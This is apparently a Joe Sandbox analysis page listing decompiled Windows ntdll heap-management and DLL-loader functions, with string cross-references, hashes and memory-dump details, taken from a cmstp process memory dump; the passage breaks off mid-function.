0x050fa95a
0x050fa95a
0x050fa95c
0x050fa95f
0x050fa961
0x050fa961
0x050fa967
0x050fa96a
0x050fa972
0x050faa02
0x050faa06
0x050faa10
0x050faa16
0x050faa16
0x050faa1b
0x050faa21
0x050faa24
0x050faa27
0x050faa29
0x050faa2c
0x050faa32
0x00000000
0x00000000
0x00000000
0x00000000
0x050fa978
0x050fa978
0x050fa97b
0x050fa981
0x050fa996
0x050fa998
0x050fa99f
0x050fa9a2
0x0514238a
0x050fa9a8
0x050fa9a8
0x050fa9a8
0x050fa9aa
0x050fa9ad
0x050fa9b0
0x050fa9bb
0x050fa9be
0x050fa9c7
0x050fa9c9
0x050fa9c9
0x050fa9cc
0x050fa9d1
0x050faa6d
0x050faa70
0x050faa73
0x050faa75
0x050faa79
0x050faa7e
0x050faa82
0x050faa8f
0x050faa94
0x050faa96
0x05142392
0x051423a1
0x051423a1
0x050faa9c
0x050faa9f
0x050faaa2
0x050faaa2
0x050faaa8
0x050faaab
0x050faaaf
0x00000000
0x050faab5
0x00000000
0x050faab5
0x050fa9d7
0x050fa9d7
0x050fa9da
0x050fa9e0
0x050fa9e3
0x050fa9e6
0x050fa9e9
0x050fa9eb
0x050fa9fd
0x050fa9fd
0x00000000
0x050fa9eb
0x00000000
0x00000000
0x00000000
0x050fa983
0x050fa983
0x050fa983
0x050fa987
0x050fa995
0x050fa995
0x050fa995
0x050fa995
0x050fa989
0x050fa98e
0x00000000
0x050fa990
0x00000000
0x050fa990
0x050fa98e
0x00000000
0x050fa983
0x050fa972
0x050fa90a
0x050faa34
0x050faa34
0x050faa40
0x050faa43
0x050faa46
0x050faa4d
0x051423ab
0x051423b2
0x051423b8
0x051423be
0x051423c3
0x051423c5
0x051423cb
0x051423d1
0x051423d5
0x051423f6
0x051423fb
0x051423d7
0x051423ec
0x051423f1
0x05142403
0x05142408
0x05142410
0x05142417
0x05142422
0x05142422
0x05142417
0x051423c5
0x051423b2
0x00000000

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 05142403
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 051422F3
HEAP[%wZ]: , xrefs: 051422D7, 051423E7
HEAP: , xrefs: 051422E6, 051423F6

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: fdb6e122a89d6978e12d567859325e97f41401faa99a25c13769a55114c3d926
Instruction ID: aab86fb49762d3d1b3f5b1694cc95b72173365488387359b0c380af5a2ffebd6
Opcode Fuzzy Hash: fdb6e122a89d6978e12d567859325e97f41401faa99a25c13769a55114c3d926
Instruction Fuzzy Hash: 79D1D034B042459FDB28CF68D490BBEB7F2FF48300F158169E95A9BB41E334A985CB60

Uniqueness

Uniqueness Score: -1.00%

Function 050FA229 Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E050FA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E050FDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E05119730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0519A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E05119660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E050DB150();
					} else {
						E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E050DB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E050F7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0519138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E050F7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E050F7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E05191582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E050F7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E050F7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E05191582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0512D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x050fa229
0x050fa231
0x050fa23f
0x050fa242
0x050fa244
0x050fa24c
0x050fa255
0x050fa25a
0x050fa25f
0x05141c76
0x05141c78
0x05141c7e
0x05141c7f
0x05141c81
0x05141c82
0x05141c84
0x05141c89
0x05141c8b
0x05141c9e
0x05141c9e
0x05141cab
0x05141cb2
0x00000000
0x05141cb2
0x05141c8d
0x05141c92
0x00000000
0x00000000
0x05141c94
0x05141c98
0x00000000
0x00000000
0x00000000
0x05141c98
0x050fa265
0x050fa265
0x050fa266
0x050fa26f
0x050fa270
0x050fa276
0x050fa277
0x050fa279
0x050fa27e
0x050fa282
0x05141db5
0x05141dbb
0x05141dc1
0x05141dc5
0x05141de4
0x05141de9
0x05141dc7
0x05141ddc
0x05141de1
0x05141def
0x05141df3
0x05141df7
0x05141dfe
0x05141e06
0x050fa302
0x050fa308
0x050fa308
0x050fa288
0x050fa28d
0x050fa294
0x05141cc1
0x050fa29a
0x050fa29a
0x050fa29a
0x050fa29f
0x05141ccb
0x05141cd1
0x05141cd8
0x05141cea
0x05141cea
0x05141cd8
0x050fa2a9
0x050fa2af
0x050fa2bc
0x05141cfd
0x050fa2c2
0x050fa2c2
0x050fa2c2
0x050fa2c7
0x05141d07
0x05141d0d
0x05141d14
0x05141d1f
0x05141d21
0x05141d2c
0x05141d2c
0x05141d2c
0x05141d47
0x05141d47
0x05141d14
0x050fa2cd
0x050fa2d2
0x050fa2d9
0x05141d5a
0x050fa2df
0x050fa2df
0x050fa2df
0x050fa2e4
0x05141d69
0x05141d6b
0x05141d76
0x05141d76
0x05141d76
0x05141d91
0x05141d91
0x050fa2ea
0x050fa2f0
0x050fa2f5
0x05141da8
0x05141dad
0x05141dad
0x050fa2fd
0x050fa300
0x00000000

Strings

`, xrefs: 05141C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 05141DF9
HEAP[%wZ]: , xrefs: 05141DD7
HEAP: , xrefs: 05141DE4

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 98bc652dfe9c04125576a0ae8b73e2c57ad638ff541ec62dbcf87e3005f0d3c6
Instruction ID: 4e991b06b61478f584480156d86d9a192b3da9fc0c710b9e5c4db230b232b2c2
Opcode Fuzzy Hash: 98bc652dfe9c04125576a0ae8b73e2c57ad638ff541ec62dbcf87e3005f0d3c6
Instruction Fuzzy Hash: B351F372344A80AFD722DB68D848F6F77E9FF80750F090868F9558B691D774D980CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05108E00 Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E05108E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x51cd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x51c8464; // 0x761c0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x51c5780 & 0x00000003) != 0) {
							E05155510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x51c5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0511B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x51c7984; // 0x33a2ac0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x51c8464; // 0x761c0110
					 *0x51cb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E05109B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x51c5780 & 0x00000005) != 0) {
						_push(_t49);
						E05155510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x05108e0f
0x05108e16
0x05108e19
0x05108e1b
0x05108e21
0x05108e7f
0x05108e85
0x05149354
0x0514936c
0x05149371
0x0514937b
0x05149381
0x05149381
0x0514937b
0x05108e9d
0x05108e9d
0x05108e29
0x05108e2c
0x05108e38
0x05108e3e
0x05108e43
0x05108eb5
0x05108eb9
0x051492aa
0x051492af
0x051492e8
0x051492e8
0x051492af
0x05108eb9
0x05108e45
0x05108e53
0x05108e5b
0x05108e5f
0x05108e78
0x05108e78
0x05108e7d
0x05108ec3
0x05108ecd
0x05108ed2
0x05108ed2
0x05108ec5
0x05108ec5
0x00000000
0x05108e7d
0x05108e67
0x05108ea4
0x0514931a
0x00000000
0x00000000
0x05149320
0x05108ea4
0x05108e70
0x05149325
0x05149340
0x05149345
0x05149345
0x05108e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0514932A
LdrpFindDllActivationContext, xrefs: 05149331, 0514935D
minkernel\ntdll\ldrsnap.c, xrefs: 0514933B, 05149367
Querying the active activation context failed with status 0x%08lx, xrefs: 05149357

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 32c0e51d8bddda9e59e7f4c09c508527c733a14df3853270916a7d9ea5fb5633
Instruction ID: 4d89521c84fb32f27af929ac561ec97f6c6f8439bbe86a7503cbc573def09a9f
Opcode Fuzzy Hash: 32c0e51d8bddda9e59e7f4c09c508527c733a14df3853270916a7d9ea5fb5633
Instruction Fuzzy Hash: B5412A31A0C315FFEB35AB18C88DF7A7BA6BB05658F066169E805571D1EBF06DC0C681

Uniqueness

Uniqueness Score: -1.00%

Function 051949A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 05194AD6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 05194A61
HEAP[%wZ]: , xrefs: 05194A3D, 05194AB7
HEAP: , xrefs: 05194A4A, 05194A5D, 05194A5F, 05194AC4

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 797e955d7d711ca811bbce3d78f80c86001d2811f1d475a03fc78f083a0e68a1
Instruction ID: 92c9d4b245fae05c3e54e3f28dfab4f134e7118bfb9361e1129422683c6e3d80
Opcode Fuzzy Hash: 797e955d7d711ca811bbce3d78f80c86001d2811f1d475a03fc78f083a0e68a1
Instruction Fuzzy Hash: D831E535204210EFDF38DB98D889FAFB7E9FF04660F254159F406DB251D7B1A841CA6A

Uniqueness

Uniqueness Score: -1.00%

Function 050F99BF Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E050F99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0518FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0519A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0512D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E050DB150();
										} else {
											E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E050DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x51c6378 = 1;
											asm("int3");
											 *0x51c6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E050FA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E050FA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E050FBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0519A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E050FA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E050FA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0512D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E050DB150();
								} else {
									E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E050DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x51c6378 = 1;
									asm("int3");
									 *0x51c6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0518FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0519A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0512D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E050DB150();
													} else {
														E050DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E050DB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x51c6378 = 1;
														asm("int3");
														 *0x51c6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
